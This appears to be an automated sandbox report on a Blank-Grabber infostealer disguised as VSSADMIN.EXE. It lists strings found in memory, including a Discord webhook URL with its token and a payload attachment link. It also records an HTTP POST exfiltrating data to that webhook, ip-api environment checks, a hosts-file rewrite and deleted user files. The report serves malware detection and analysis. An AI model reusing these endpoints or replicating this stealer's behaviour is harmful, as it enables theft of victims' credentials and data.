              Source: VSSADMIN.EXE.exe, 00000001.00000003.192780632.0000014C6CC94000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192761325.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192563442.0000014C6CC94000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192539784.0000014C6CCF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue42195.
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1125126396101021879/1152337129716842596/Blank-user.rar
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245142886.0000014C6D3F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192490005.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192251935.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190636870.0000014C6CC70000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192761325.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191866250.0000014C6CC6F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192002784.0000014C6CC6A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191661797.0000014C6CC6A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190589554.0000014C6CC70000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191646152.0000014C6CBE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244243794.0000014C6D092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dotnet.micr
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245121622.0000014C6D2C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
              Source: VSSADMIN.EXE.exe, 00000001.00000003.191981255.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191835270.0000014C6CD0E000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191900080.0000014C6D2C9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192066107.0000014C6CD05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244623924.0000014C6C608000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2168
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245121622.0000014C6D2C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2680
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D53C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D53C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920P
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3020
              Source: powershell.exe, 00000008.00000002.200799345.000001960159C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.00000196013E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.0000019601682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.00000196015CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB94965000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D256000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244323782.0000014C6D256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244230392.0000014C6D0A8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0A8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0BD000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.g
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192539784.0000014C6CCF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1125126396101021879/1152337129716842596/Blank-user.rar
              Source: powershell.exe, 00000008.00000002.203170941.000001961006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA2F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000003.191782438.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191891921.0000014C6CBD7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191706435.0000014C6CBD7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244706685.0000014C6CAB0000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190653423.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190620855.0000014C6CBDB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192012033.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD402EB000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D24A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D51C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245994756.00007FFD43FB3000.00000004.00000001.01000000.00000010.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189820148.0000014C6C9F5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244623924.0000014C6C580000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189777515.0000014C6CA10000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189806826.0000014C6CA14000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189777515.0000014C6C9F5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189789642.0000014C6CA14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD40388000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownDNS traffic detected: queries for: blank-2md3e.in
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.0.4
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.0.4
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownHTTP traffic detected: POST /api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 838652User-Agent: python-urllib3/2.0.4Content-Type: multipart/form-data; boundary=df04b12a7b80d1dae6cbaca19bb29ce2

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Modifies existing user documents (likely ransomware behavior)
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\LTKMYBSEYZ.jpgJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\LTKMYBSEYZ.jpgJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\ONBQCLYSPU.docxJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\ONBQCLYSPU.docxJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\WUTJSCBCFX.pngJump to behavior
              Modifies the hosts file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: cmd.exeProcess created: 45

              System Summary

              barindex
              Very long command line found
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C95D9C0_2_00007FF614C95D9C
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C94E500_2_00007FF614C94E50
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C767A00_2_00007FF614C767A0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C867440_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C80DE00_2_00007FF614C80DE0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C8FA380_2_00007FF614C8FA38
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C865900_2_00007FF614C86590
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C92D600_2_00007FF614C92D60
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C81EA00_2_00007FF614C81EA0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C828300_2_00007FF614C82830
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C86FC80_2_00007FF614C86FC8
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C80FE40_2_00007FF614C80FE4
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C84F800_2_00007FF614C84F80
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C8D7480_2_00007FF614C8D748
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C8D0C80_2_00007FF614C8D0C8
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C780D00_2_00007FF614C780D0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C950CC0_2_00007FF614C950CC
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C867440_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C958500_2_00007FF614C95850
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C931FC0_2_00007FF614C931FC
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C809D00_2_00007FF614C809D0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C811F00_2_00007FF614C811F0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C909E40_2_00007FF614C909E4
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C8FA380_2_00007FF614C8FA38
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C8CC340_2_00007FF614C8CC34
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C82C340_2_00007FF614C82C34
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C88BD00_2_00007FF614C88BD0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C80BD40_2_00007FF614C80BD4
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C813F40_2_00007FF614C813F4
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C71B900_2_00007FF614C71B90
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C98B980_2_00007FF614C98B98
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C95D9C1_2_00007FF614C95D9C
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C80DE01_2_00007FF614C80DE0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C8FA381_2_00007FF614C8FA38
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C865901_2_00007FF614C86590
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C92D601_2_00007FF614C92D60
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C81EA01_2_00007FF614C81EA0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C94E501_2_00007FF614C94E50
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C828301_2_00007FF614C82830
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C86FC81_2_00007FF614C86FC8
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C80FE41_2_00007FF614C80FE4
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C84F801_2_00007FF614C84F80
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C767A01_2_00007FF614C767A0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C8D7481_2_00007FF614C8D748
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C867441_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C8D0C81_2_00007FF614C8D0C8
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C780D01_2_00007FF614C780D0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C950CC1_2_00007FF614C950CC
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C867441_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C958501_2_00007FF614C95850
